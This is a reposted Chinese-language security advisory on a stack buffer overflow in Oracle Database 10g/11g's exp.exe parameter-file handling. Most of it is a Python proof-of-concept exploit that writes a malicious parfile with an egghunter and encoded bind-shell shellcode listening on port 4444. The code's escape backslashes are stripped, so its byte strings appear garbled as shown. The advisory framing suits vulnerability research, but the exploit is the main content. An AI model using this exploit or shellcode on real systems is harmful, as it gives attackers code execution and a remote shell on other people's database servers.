当前位置:  数据库>oracle

Oracle Database “exp.exe”参数文件远程缓冲区溢出漏洞

    来源: 互联网  发布时间:2017-03-29

    本文导语: Oracle Database "exp.exe"参数文件远程缓冲区溢出漏洞 发布日期:2011-02-15更新日期:2011-02-15 受影响系统:Oracle 10g Oracle Oracle11g描述:--------------------------------------------------------------------------------BUGTRAQ  ID: 46376 Oracle Database是甲骨文公...

Oracle Database "exp.exe"参数文件远程缓冲区溢出漏洞

发布日期:2011-02-15
更新日期:2011-02-15

受影响系统:
Oracle 10g
Oracle Oracle11g
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 46376




Oracle Database是甲骨文公司的一款关系数据库管理系统。

Oracle Database在验证用户提供的数据时存在远程栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用程序中执行任意代码,造成拒绝服务。

此漏洞位于解析Oracle导出程序的命令行上指定的参数文件中的“file”字段。


测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Steven Seeley (seeleymagic@hotmail.com)提供了如下测试方法:

#!/usr/bin/python
# Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit
# Date found approx: 9/3/2010
# Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html
# Version: 10.x and 11g r1 (r2 untested)
# Tested on: Windows XP SP3 En
# Usage:
# $ORACLE_HOMEexp.exe system parfile=overflow_oracle_exp.txt






def banner():
    print "nt| ------------------------------------- |"
    print "t| Oracle exp.exe code execution explo!t |"
    print "t| by mr_me - net-ninja.net ------------ |n"
   
header = ("x69x6Ex64x65x78x65x73x3Dx6Ex0Dx0Ax6Cx6Fx67x3Dx72x65x73x75"
"x6Cx74x73x2Ex74x78x74x0Dx0Ax66x69x6Cx65x3D");





# aligned to edx
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# bind shell on port 4444, alpha3 encoded and aligned with edi
sc = ("hffffk4diFkDwj02Dwk0D7AuEE4n07073K023H8O8L4t8O1M0z110q160q150e2N0n7K0i1K130"
"J0g0i1400110t16090y150r0V122l0s080o0y0r2M0s13150r122k0t0W0q2M0e0v0t0a0s110q000p1"
"P0h2m0j0A0s0q0z7m1M2x1N1N142G1N7l0t0r1N2F1O061O7m1M121O010g0x0i1K0f04130t107p180"
"10t2y0s2Z0j130w7p1P7l0g051P2N1N08191N147k0q1K0h7o0d2r0b2I122F1N2I1N130c2Z0d2Z187"
"l0d2F0i2l122H1O2o122l1M1M2k191K180o2N1L020g05112o1N2j1M121P0w112k1K2F1O2k1N0y121"
"90e0w0r2M0r7m0g2J1O100h2I0e0r0c0r1P7o1O0x117k0i0v1P0z147o0z060e7m0s7K102A1O0p100"
"90e7k0y2y2o2B162A0r1K0p2q0d2m1M2o0s0z1M1O0w150y0v0c2I132Z0i190t2F0g2D182F0u7l0q2"
"O0x120y0p0f2l0a7N17130w7N0i0c0t030b2t1N2F172u1N0p0z2M0c2O1O2n162J0g2D0g0x142k122"
"k112E0g0u0u2O0v1912120g2M0d0v1N191L0r0f2D1N131O121O0y0c2E0u0z1N0y1O7p14170z2O1O1"
"50g0s0y7M1N7m0a0u122N0d170t120a101M2I1L1416001L1K0a1L1O2H0z000e7m1M151M010r2N0u2"
"D0g190d2l0t0s142K0w2j142F157m1O2A1M2Z0g2z0a2N0p111500170r122B182H1N030x2z0v7l1K0"
"x0f2M0g7m1L0q0e2J0x2E1M7o1119100q0w1414101O021L0z161O0z2H1M7k0r001L7n0g7p1M2j1L0"
"u1714157m1N191M2Z14041N2M0v2E19140f2H0e7l1O021L2o0d1915010t0p15061O041M7p1K130g0"
"t1L2s172A1M0p17030w191O2O1O110d0w1M141M7m117p0f070t1716020w0q0f040f09182C1L7p0f2"
"C0b170d1N0c1M1L7n1O191N2E162E0d7m0h0w1N2C0q061M2m1M2j1K0g1M010e13127p1O7n0f130b7"
"p1K120i130u2D0b1M0x110z2L0x2n0v2C0g2H1N0w0y2C1P1M1M2N0f0w0f2j1O2O1M7n0u02172k150"
"7140x0d0s141N0v2F0b2l152E0u03142o0t0v1N2n1M080f2K0x2m1L2k110c1M2l141M1N171M050f2"
"L1M2j1O0213051N2l1M020i180r7n1N0w190q1L7l14101N171L0q0e2H1O011M0311121O7N1K2O1N2"
"C16060d1M1M161M2K1N0u1M2N01VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEJN"
"0I673K0L3N8O8L5D8O131J171A161A151T7N6N7K1Y15121J1W6O1510111D17191I151C1W17LL1E68"
"6O1I1C7M1C1M151C13LK1E1W1GLK1U1G1E1Q1C116P106P1Q1YLM6K1A1C1A1KLL1L691N1K1J171O7Z"
"1B1B1H161N161NLL1H121N111W161Y1K1W15131E1N1019101E691BLL64151F601QLM1V141Q7N1O18"
"191N127J6P1K6N7O1T631S681L161H181O131R7Z1U7Z19LM7O171YLM161Y1OLO12191M13181I1K19"
"6O681M141V1511191M1J1M131Q1G117Z10171OLN1N1I12181T1G1C7M1C1C1V7J1O101Y681T1C1S1B"
"1QLN1O16171K1Y1G1Q1K15LN1N1F1TLLLMLM161O1O1F11181T1K1I681D1317601C1J6P601QLM1MLN"
"1B1J1M1O1G151I6P1S18157K1Y191B101W1419661A1M6P7N1L1C1ILN1U1L1Q68141B1G7O1Y1S1E12"
"1W641O6712651N1A11LL1T141L1O177J69151W1L177J12LK1O151W1E1F1J1F19121L1T1N1T161N19"
"1L1C1P141J1E1O131N1O1R641D1J1N1I1L1F14141ILO1O151W1B1I7L1OLM1Q1E177O1T1L1G1C1Q10"
"13LL1L1417101L1K1Q1M1N691K101TLL1H151L101D101D651R191TLL1D1C157J1C1K156714LL1N61"
"1L7Z1W7K7JLO6P11141N171D141219681O121H7K1GLM1K1I7MLL1V191M111T7K131411111JLO101G"
"1D7Z14101N141L1K171N1K691K7K1C101H1O1TLK1N1K1L1D131E14LL1N181K7J101E1O6818151914"
"68191TLM1N121LLO1T1914111D6P14161I621L601H1B1W1B1I1216611M6P16151D1O1N7O1L1A1T1F"
"1I1D1L1917111P661A1617161G101W147J1719601O101W631S1A1T1M1SLL1MLN1O181O6517651ULL"
"1Y1F1O661E1F1MLL1I1K1K1R1I1A1U1313611N1E68121S671H1I1Y101F151R1L1M111L1B1K1O1G63"
"1V7L1N1D1L121P1M13LN1V191U1J1N7O1LLN1D1114LN1417141H1T1C14101G651QLO14651D1C14LO"
"1D1F1NLN1L191W7M1K1M1LLO11651MLL141L1N161L131W7M1I1K1N1312151NLL1L121YLK1D181N1G"
"191B1MLO1J101N171L1A1T681N101L1311131O7O10LO1O6317161T1H1H171L7K1NLN1L7M01WWYA44"
"44444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB"
"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBJKKS0YJKKU9XJXKOKOKO0O0I0I0I0I0I0I0"
"Q0Z0V0T0X0603000V0X0411000B060H0H000B03000B0C0V0X020B0D0B0H041102110D00110D0T0B0"
"D0Q0B00110D110V0X040Z080B0D0J0O0M0N0O0L060K0N0O0D0J0N0I0O0O0O0O0O0O0O0B0V0K0X0N0"
"V0F020F020K080E0D0N0C0K0X0N0G0E0P0J0W110P0O0N0K080O040J110K0X0O0U0B0R11000K0N0C0"
"N0B0S0I0T0K080F0S0K0X11000P0N11030B0L0I090N0J0F0X0B0L0F0W0G00110L0L0L0M0P11000D0"
"L0K0N0F0O0K030F0U0F0B0J0B0E0W0C0N0K0X0O0U0F0R110P0K0N0H060K0X0N0P0K040K0H0O0U0N1"
"111000K0N0C000N0R0K0H0I080N060F0B0N11110V0C0L110C0B0L0F0F0K0H0B0T0B030K0X0B0D0N0"
"P0K080B0G0N110M0J0K0H0B0T0J0P0P050J0F0P0X0P0D0P0P0N0N0B050O0O0H0M110S0K0M0H060C0"
"U0H0V0J060C030D030J0V0G0G0C0G0D030O0U0F0U0O0O0B0M0J0V0K0L0M0N0N0O0K0S0B0E0O0O0H0"
"M0O050I0H0E0N0H0V110H0M0N0J0P0D000E0U0L0F0D0P0O0O0B0M0J060I0M0I0P0E0O0M0J0G0U0O0"
"O0H0M0C0E0C0E0C0U0C0U0C0E0C040C0E0C040C050O0O0B0M0H0V0J0V11110N050H060C050I08110"
"N0E0I0J0F0F0J0L0Q0B0W0G0L0G0U0O0O0H0M0L060B01110E0E050O0O0B0M0J060F0J0M0J0P0B0I0"
"N0G0U0O0O0H0M0C050E050O0O0B0M0J060E0N0I0D0H080I0T0G0U0O0O0H0M0B0U0F050F0E0E050O0"
"O0B0M0C0I0J0V0G0N0I070H0L0I070G0E0O0O0H0M0E0U0O0O0B0M0H060L0V0F0F0H060J0F0C0V0M0"
"V0I080E0N0L0V0B0U0I0U0I0R0N0L0I0H0G0N0L060F0T0I0X0D0N110C0B0L0C0O0L0J0P0O0D0T0M0"
"20P0O0D0T0N0R0C0I0M0X0L0G0J0S0K0J0K0J0K0J0J0F0D0W0P0O0C0K0H0Q0O0O0E0W0F0T0O0O0H0"
"M0K0E0G050D051105110U11050L0F110P1105110E0E05110E0O0O0B0M0J0V0M0J0I0M0E000P0L0C0"
"50O0O0H0M0L0V0O0O0O0O0G030O0O0B0M0K0X0G0E0N0O0C080F0L0F060O0O0H0M0D0U0O0O0B0M0J0"
"60O0N0P0L0B0N0B060C0U0O0O0H0M0O0O0B0M0ZKPA")
























































# align edx
# MOV EDX,ESP
# SUB EDX,64
# SUB EDX,64
# SUB EDX,64
# SUB EDX,32
# SUB EDX,64           
# JMP EDX
align = ("x8bxd4x83xeax64x83xeax64x83"
"xeax64x83xeax32x83xeax64xffxe2x43");








exploit = header
exploit += "x43" * 39
exploit += align
exploit += egghunter
exploit += "x41" * (533-len(exploit))
exploit += "xe9x2axfexffxff"
exploit += "xbbx8bxe2x61"
exploit += "xebxf5"
exploit += "x41" * 100
exploit += "x57x30x30x54" * 2
exploit += sc
exploit += "x43" * (6000-len(exploit))
exploit += ".dmp"
banner()
print ("[+] Shellcode byte size: %s" % (len(sc)))
print ("[+] Writing %s bytes of exploit code to param file" % (len(exploit)))
pwnfile = open('overflow_oracle_exp.txt','w');
pwnfile.write(exploit);
pwnfile.close()
print "[+] Exploit overflow_oracle_exp.txt file created!"


















建议:
--------------------------------------------------------------------------------
厂商补丁:

Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.oracle.com


    
 
 
 
本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • Oracle 12c发布简单介绍及官方下载地址
  • 在linux下安装oracle,如何设置让oracle自动启动!也就是让oracle那个服务自动启动,不是手动的
  • oracle 11g最新版官方下载地址
  • 请问su oracle 和su - oracle有什么不同?
  • Oracle 数据库(oracle Database)Select 多表关联查询方式
  • 虚拟机装Oracle R12与Oracle10g
  • Oracle数据库(Oracle Database)体系结构及基本组成介绍
  • Oracle 数据库开发工具 Oracle SQL Developer
  • 如何设置让Oracle SQL Developer显示的时间包含时分秒
  • Oracle EBS R12 支持 Oracle Database 11g
  • Oracle 10g和Oracle 11g网格技术介绍
  • SCO unix下安装oracle,但没有光盘,请大家推荐一个oracle下载站点(unix版本的)。谢谢!!!!
  • oracle中如何把表中具有相同值列的多行数据合并成一行
  • 请问大家用oracle数据库, 用import oracle.*;下的东西么? 还是用标准库?
  • Oracle 数据库(oracle Database)性能调优技术详解
  • Linux /$ORACLE_HOME $ORACLE_HOME
  • ORACLE日期相关操作
  • Linux系统下Oracle的启动与Oracle监听的启动
  • ORACLE数据库常用字段数据类型介绍
  • 请问在solaris下安装ORACLE,用root用户和用oracle用户安装有什么区别么?
  • Oracle 12c的九大最新技术特性介绍
  • 网间Oracle的连接,远程连接Oracle服务器??


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3